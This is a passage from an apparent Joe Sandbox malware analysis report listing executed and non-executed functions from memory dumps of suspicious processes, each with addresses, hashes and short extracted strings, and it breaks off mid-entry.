                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bac0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1331302ace8906dc7ff6d84222f3b4709e12167f194fc678014da51f1390e612
                                                            • Instruction ID: b00b1116aa25af495023ca70037b5d0b26bb27b9196e46cda1e400c7530b80a8
                                                            • Opcode Fuzzy Hash: 1331302ace8906dc7ff6d84222f3b4709e12167f194fc678014da51f1390e612
                                                            • Instruction Fuzzy Hash: 92B01200D5F44F40E83433FB095217870405B44104FC20170D40CD119198CE12944286
                                                            Function 00007FFD9BAFD5A0 Relevance: .0, Instructions: 7COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9baf1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c7d2018242a0126bf40494a73c7f59b4a5ac1d0e95081e02a01ac1a34b36981f
                                                            • Instruction ID: 2b18dceb9d33b39305405c3ad9930cbe0a3ac247b75680c48a129e04e1d765a3
                                                            • Opcode Fuzzy Hash: c7d2018242a0126bf40494a73c7f59b4a5ac1d0e95081e02a01ac1a34b36981f
                                                            • Instruction Fuzzy Hash: EBA00144E6692E01A91832BA4A965A53CA25A88295FC901A1A948881D7E88D52EA12A2
                                                            Function 00007FFD9BAD2C40 Relevance: .0, Instructions: 7COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bad0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1249c1b0514c7178be080b616e912f9abb5f72fd4ef16b669b0acf00b4ae93e6
                                                            • Instruction ID: a84aa108b41ec2fe9044ace8939f3ab70d8be2d6593a8267f9aa5b5f908a2e05
                                                            • Opcode Fuzzy Hash: 1249c1b0514c7178be080b616e912f9abb5f72fd4ef16b669b0acf00b4ae93e6
                                                            • Instruction Fuzzy Hash: 9AA00204E9780E01D81832FB1E970A474505FA9154FC61960E80985196FCCE5BE90393
                                                            Function 00007FFD9BAC6A8C Relevance: .0, Instructions: 7COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bac0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cac71e77d6b68aa96a6892ae0be65438d06d493e10b968ad6f9787162aca6423
                                                            • Instruction ID: 08126a0ba31587a5188420524d8baa40e4e82ab567600cd11480db9608fdb9cf
                                                            • Opcode Fuzzy Hash: cac71e77d6b68aa96a6892ae0be65438d06d493e10b968ad6f9787162aca6423
                                                            • Instruction Fuzzy Hash: B8B09201F0E12B46F1B032D4052937902D00F70344F0B0438D80C872E2FDDCAE010149

                                                            Non-executed Functions

                                                            Function 00007FFD9BAC09B0 Relevance: 5.2, Strings: 4, Instructions: 195COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000024.00000002.1995674334.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_36_2_7ffd9bac0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: c9$!k9$"s9$#{9
                                                            • API String ID: 0-1692736845
                                                            • Opcode ID: 85c06e23354b5e73a81d95539ee200d0fde7fdbb8bb3cd475c1631cb099e5e18
                                                            • Instruction ID: 579273eef08cfa2f0780210e9b83f76135f4f5566ba582a9906b28aa7542d3a7
                                                            • Opcode Fuzzy Hash: 85c06e23354b5e73a81d95539ee200d0fde7fdbb8bb3cd475c1631cb099e5e18
                                                            • Instruction Fuzzy Hash: E4514C06B1A46A45E339B7FD78219FD6B449FA927FB0843B7F85D8E0C74C486085C2E9

                                                            Executed Functions

                                                            Function 00007FFD9BAC0D48 Relevance: 1.5, Strings: 1, Instructions: 257COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bac0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 5Y_H
                                                            • API String ID: 0-3237497481
                                                            • Opcode ID: 8c27e72acf8dfe3bf16716be77a7ad7d3640c6b487432d1ae3b0d8d723b53278
                                                            • Instruction ID: 16cec2a0dadae27774669c350269a2850b77d79f87d2d8bef3cb12d60a70f0c0
                                                            • Opcode Fuzzy Hash: 8c27e72acf8dfe3bf16716be77a7ad7d3640c6b487432d1ae3b0d8d723b53278
                                                            • Instruction Fuzzy Hash: D791B471A1DA8D8FD759EB6C8C697B97BE1FB65314F4102BEE049C72E2CBB914018740
                                                            Function 00007FFD9BAF1441 Relevance: .5, Instructions: 469COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9baf1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d083ec232b6b44604c211c1e83a2ce589485f5bf7d31fe36969f8d29f6af8d19
                                                            • Instruction ID: 9828a427359fe39f0263c7cb770282f6a7a3e2a5ef055c250d35877784978a39
                                                            • Opcode Fuzzy Hash: d083ec232b6b44604c211c1e83a2ce589485f5bf7d31fe36969f8d29f6af8d19
                                                            • Instruction Fuzzy Hash: 0ED19021B2E78D0BE32D4B684D920F53B91EBA2306B1986BDD5DBC7097D968A50783C1
                                                            Function 00007FFD9BAF1475 Relevance: .3, Instructions: 322COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9baf1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 367e841e9c0e649e3cff6f417649fa37a9ffff2c4091ff6e541b47ba0574df76
                                                            • Instruction ID: 65f95e7b9d49bf137d9cc99483d921f3e478bc38fe21c18322e108bbec08c0bc
                                                            • Opcode Fuzzy Hash: 367e841e9c0e649e3cff6f417649fa37a9ffff2c4091ff6e541b47ba0574df76
                                                            • Instruction Fuzzy Hash: FF81C071F2D34E0BE32C4A684C920B13BD5EBE6216B1A867DD9DBC3197DD68B90742C1
                                                            Function 00007FFD9BAFA7C9 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9baf1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: M
                                                            • API String ID: 0-3664761504
                                                            • Opcode ID: e50a372c66d73d6959bffac753331f53057a701bfd7f2146432d1e5f8e268a21
                                                            • Instruction ID: 1756b7ed639bd5e73031c1d9ae49dbd7a484f93142dc853b1486fea5542a7c9d
                                                            • Opcode Fuzzy Hash: e50a372c66d73d6959bffac753331f53057a701bfd7f2146432d1e5f8e268a21
                                                            • Instruction Fuzzy Hash: 58E0656160F7C44FDB15AA3484698947F70EF6721174A52EEC045CB1A3EA1D9886C701
                                                            Function 00007FFD9BAFA739 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9baf1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: M
                                                            • API String ID: 0-3664761504
                                                            • Opcode ID: 1efa397fa057cd1a98d39ec1929409eca4709694baa5fd15f1f24b4f36f222a6
                                                            • Instruction ID: dbfe1148f7c8508a008613384f7039a97ab8a1aed294f159a683bd8f5a2eda34
                                                            • Opcode Fuzzy Hash: 1efa397fa057cd1a98d39ec1929409eca4709694baa5fd15f1f24b4f36f222a6
                                                            • Instruction Fuzzy Hash: E9F0656160F7C44FDB16AB3488698547F70EF6720174A52EFC445CF1A3EA1D9885C711
                                                            Function 00007FFD9BAD39D9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bad0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: M
                                                            • API String ID: 0-3664761504
                                                            • Opcode ID: 2952cae637c9117dcc4fcc3abe100bd0baad343fe22032601ccc96e4e828180a
                                                            • Instruction ID: 4d5a0c90985db2520885e20079e1b0c4d84c80894ee2ef7fa524ac77e3709838
                                                            • Opcode Fuzzy Hash: 2952cae637c9117dcc4fcc3abe100bd0baad343fe22032601ccc96e4e828180a
                                                            • Instruction Fuzzy Hash: 40E0127164E3C44FCB1AEB7488688557FA1EF6721174A52EEC146CF2E7EA2DC889C701
                                                            Function 00007FFD9BAE5729 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAE3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bae3000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: M
                                                            • API String ID: 0-3664761504
                                                            • Opcode ID: 142d378f8b1242da5de8d4cbee63bc27b24d8fe6a0b0184704956c9931c2b726
                                                            • Instruction ID: 51f292edaf2bce4b247d704aa40d5874d882742b414489493e199da3f8c9224a
                                                            • Opcode Fuzzy Hash: 142d378f8b1242da5de8d4cbee63bc27b24d8fe6a0b0184704956c9931c2b726
                                                            • Instruction Fuzzy Hash: 6CE0656164E7C44FC716A6748869455BFA0EF6721174A45EFC046CF1A7DA1D8845C701
                                                            Function 00007FFD9BAFAFB9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9baf1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: I
                                                            • API String ID: 0-3707901625
                                                            • Opcode ID: 4fdc5037d1a2ffd65cb09e0cabd99c4174b2f00b8cc0503b2845a88e5437da41
                                                            • Instruction ID: 8a044a4d47703dffb4ca39fd4bb869024ee6461e978eeca7060392de76daab0e
                                                            • Opcode Fuzzy Hash: 4fdc5037d1a2ffd65cb09e0cabd99c4174b2f00b8cc0503b2845a88e5437da41
                                                            • Instruction Fuzzy Hash: 21E01AA154F7C44FCB16EB75887A9857FA0AE6721078B40EEC085CF1B3E62D8949C701
                                                            Function 00007FFD9BAF20D9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9baf1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: I
                                                            • API String ID: 0-3707901625
                                                            • Opcode ID: 4b94087cd1d380c1118e307e5decef35a618b8e6a1e81a5d2776b665a6c132bb
                                                            • Instruction ID: 55fdb63b9008d460a4d9902cd6b10540827652113c681a0da6b0002013a1fde3
                                                            • Opcode Fuzzy Hash: 4b94087cd1d380c1118e307e5decef35a618b8e6a1e81a5d2776b665a6c132bb
                                                            • Instruction Fuzzy Hash: 62E01A6254F7C44FCB16EB74886A9447FA0EE6731078B40EEC089CF1B3E62D9849C701
                                                            Function 00007FFD9BAD0906 Relevance: .9, Instructions: 866COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bad0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 419d73e4f0db3c69c36e037a23c3e37c85bd1c666780556710ca44d3810b2ad1
                                                            • Instruction ID: 9f5a38964d947251907f955e35b98defe30ac25f2743536ac655806161067172
                                                            • Opcode Fuzzy Hash: 419d73e4f0db3c69c36e037a23c3e37c85bd1c666780556710ca44d3810b2ad1
                                                            • Instruction Fuzzy Hash: F352B531B1D91D4FEB68FB6888A56B87392FFA8310F0146B9D05DC32A7DE786D818741
                                                            Function 00007FFD9BAD15F8 Relevance: .7, Instructions: 719COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bad0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 01486ff5fed635d99f1a3b88620ff216d258fb2a4082a044382835266001da59
                                                            • Instruction ID: afa7360e84af59866fc763e8c8c9c0f503af633ef97e95e861cbdd790703f304
                                                            • Opcode Fuzzy Hash: 01486ff5fed635d99f1a3b88620ff216d258fb2a4082a044382835266001da59
                                                            • Instruction Fuzzy Hash: 5132D531B1D94A4BE768FB6888A56B47392FFA8310F0146B9D05EC31E7DE78BD818741
                                                            Function 00007FFD9BAD0DC7 Relevance: .6, Instructions: 561COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bad0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 05ffab55964c6a44abc5c1946cec2cf54341044cbe28ec91767d576eb73d8340
                                                            • Instruction ID: a814e54d6f3d567f4b9f44469c4a07f9ea1a4dad3404438d006d180e7676e810
                                                            • Opcode Fuzzy Hash: 05ffab55964c6a44abc5c1946cec2cf54341044cbe28ec91767d576eb73d8340
                                                            • Instruction Fuzzy Hash: 5002B371B1D90D4BE768FB6C88A567873A2EFA8310F014679D05EC72E7DE78AD428740
                                                            Function 00007FFD9BAD0FA9 Relevance: .5, Instructions: 485COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bad0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c7268bc581e097da849be8d193e3390b0cfb8b02f8d9beffc03978de2f7de455
                                                            • Instruction ID: 1b1e8f5e015c688a8520e161f849533bf8e7646f3f963ba8cfbd03977bd978f4
                                                            • Opcode Fuzzy Hash: c7268bc581e097da849be8d193e3390b0cfb8b02f8d9beffc03978de2f7de455
                                                            • Instruction Fuzzy Hash: E8F19571B1D90E4FE768FB5888A567873A2FFA8310F014679D05EC72A7DE78AD428740
                                                            Function 00007FFD9BAF377D Relevance: .3, Instructions: 289COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9baf1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 25e51366c63ff33dadbd78a33fb33c897ac8e87618ac0fdb29911964e38f3e84
                                                            • Instruction ID: 1898bf13a3bf781639f5f003f27c4113f00fd3a2f600f0babd33e3dd0053f4d2
                                                            • Opcode Fuzzy Hash: 25e51366c63ff33dadbd78a33fb33c897ac8e87618ac0fdb29911964e38f3e84
                                                            • Instruction Fuzzy Hash: 42910621B1DB4E0FEBACEB5888B66B976C2EFA8354F048179E40DC72D7DD686D454380
                                                            Function 00007FFD9BAE93D3 Relevance: .2, Instructions: 206COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAE3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bae3000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: db00a41cc0bffb6f32b6e5fd93f92ab016a8e32560a71931c6802e9bedfc15b2
                                                            • Instruction ID: b0a8cc7832f8c6c221e6733a7469255ce05b1d5db4dd10dda18e562750a87d81
                                                            • Opcode Fuzzy Hash: db00a41cc0bffb6f32b6e5fd93f92ab016a8e32560a71931c6802e9bedfc15b2
                                                            • Instruction Fuzzy Hash: 5C61B430B19A194FDB58FB68C4A9ABD73A2FF98314F514179E00EC72D6CF38A8428741
                                                            Function 00007FFD9BAE946D Relevance: .2, Instructions: 153COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAE3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bae3000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7bbc11e9b2b5b36f7f35a07790e893703174f550de82c34751bc96cec2d7ec5f
                                                            • Instruction ID: d0e45cad16f8b277dc7cc5060758769ea0f01f7e23d5fcb96bd907477fd452c2
                                                            • Opcode Fuzzy Hash: 7bbc11e9b2b5b36f7f35a07790e893703174f550de82c34751bc96cec2d7ec5f
                                                            • Instruction Fuzzy Hash: 52419330B1890D4FDB54EF6DC458AA973E1FFA8314F51427AE01DC72E6CB39A9418790
                                                            Function 00007FFD9BAC0910 Relevance: .2, Instructions: 152COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bac0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 558bbc89375f9d52af678927ec95eb094c78eec687bed20acd2b81206710fc6e
                                                            • Instruction ID: 23fb5d31c748dc1d8d733297489b756d4e5677a2e4e37ba40cdce30c2b43bac2
                                                            • Opcode Fuzzy Hash: 558bbc89375f9d52af678927ec95eb094c78eec687bed20acd2b81206710fc6e
                                                            • Instruction Fuzzy Hash: 4E414812B0D5590FE718FBBCA4A96F87781DF5933AB0446BBE44ECB1E7CD18A8418285
                                                            Function 00007FFD9BAFB58C Relevance: .1, Instructions: 129COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9baf1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f3d668aab34f53ef8d12a9b051c49132909b8928b2c47796f8ea1390a1cafaff
                                                            • Instruction ID: e607301d5cfb61670bef96d852e80358040c1b0ab6f7070c1587ac48189e35fe
                                                            • Opcode Fuzzy Hash: f3d668aab34f53ef8d12a9b051c49132909b8928b2c47796f8ea1390a1cafaff
                                                            • Instruction Fuzzy Hash: B531E421B19A4E4FE7E4E79C48AA6F47EE1EF68350F4541B6E00DC31E6DD78A9014341
                                                            Function 00007FFD9BAC0960 Relevance: .1, Instructions: 117COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bac0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ccddfc5e53e39d7e1a93e4f42d89ed24c73481f5a7c4f7daa152e20df6e488b0
                                                            • Instruction ID: 4925c770ff88f44cc1009f2f0b2c87ea39a250c40bd30d7a0b48a63b25a2c3d1
                                                            • Opcode Fuzzy Hash: ccddfc5e53e39d7e1a93e4f42d89ed24c73481f5a7c4f7daa152e20df6e488b0
                                                            • Instruction Fuzzy Hash: 2D310911B0C91D0FE768B7AC686A6F937C1DF5833AB1545BAF80EC71EBDD18AC418285
                                                            Function 00007FFD9BAC0998 Relevance: .1, Instructions: 93COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bac0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5a89aa17dfd5deb89b85de88c08948d140a6231edf3c66bd37127a28544f21e1
                                                            • Instruction ID: 70a0f6db54a360188ce6a4090b8b19623948eff3f8e3936ba062cb46c5b9346a
                                                            • Opcode Fuzzy Hash: 5a89aa17dfd5deb89b85de88c08948d140a6231edf3c66bd37127a28544f21e1
                                                            • Instruction Fuzzy Hash: 37210720B1D91D0FE798BB6C98AD77976C2EFA8325B1501B9E80EC32F7DD58EC014285
                                                            Function 00007FFD9BAC0C25 Relevance: .1, Instructions: 83COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bac0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 282cae9a143f4622e0a540099dcf379b444d737811570b1761f24c71ae24ff60
                                                            • Instruction ID: 6232a6ee1ba154aa45c98d274a48c3799ed8f82e070dd118b993a15d4f5e3d64
                                                            • Opcode Fuzzy Hash: 282cae9a143f4622e0a540099dcf379b444d737811570b1761f24c71ae24ff60
                                                            • Instruction Fuzzy Hash: 49210736B0E29D8EE732B7A898210FC7B60EF52325F1546F7D0588B1D3D9782646C785
                                                            Function 00007FFD9BAF27C8 Relevance: .1, Instructions: 78COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9baf1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 76e38f11f65c023ded165b7cbb1cf1f3cf5aaa1894ba66bfe8f3699b24bae64a
                                                            • Instruction ID: e8aea4efe69c8578b3a31833d440f61e0039920344dcf12b01f539ab34b48750
                                                            • Opcode Fuzzy Hash: 76e38f11f65c023ded165b7cbb1cf1f3cf5aaa1894ba66bfe8f3699b24bae64a
                                                            • Instruction Fuzzy Hash: A221C932B0DB1D4FEBA8EB98C4A56E87B92EF58350F514179F40DC72D2CD686C818780
                                                            Function 00007FFD9BAD9DC6 Relevance: .1, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bad0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cdef844f12f920abc1ef62980aaeee823d5270a88780230653e038959cdc3b2c
                                                            • Instruction ID: d2ccb91710f8b1d0d86efbe440b08b8d31b7b8d88e76b249edfce80e39987984
                                                            • Opcode Fuzzy Hash: cdef844f12f920abc1ef62980aaeee823d5270a88780230653e038959cdc3b2c
                                                            • Instruction Fuzzy Hash: 4321A331B1DA594FE7A4EB6888A52A873E1EFA8300F1441B9D44DD32A2CE787D418741
                                                            Function 00007FFD9BAF1F8F Relevance: .1, Instructions: 64COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9baf1000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cad79af15adc241d54b52634ead2a2fa9c67bbb0770eb2aae80ff70459b8fe9b
                                                            • Instruction ID: c9b81c76ec41fdc27235f9e4d7b2937196cfde3ee7e9ec13c3d615b90891e3e8
                                                            • Opcode Fuzzy Hash: cad79af15adc241d54b52634ead2a2fa9c67bbb0770eb2aae80ff70459b8fe9b
                                                            • Instruction Fuzzy Hash: 6F118F2064F3C19FCB179B3488689957FA0AF53211B0E41EED4C5CF0B3DA6C494AC712
                                                            Function 00007FFD9BAC2075 Relevance: .1, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000026.00000002.2000252520.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_38_2_7ffd9bac0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
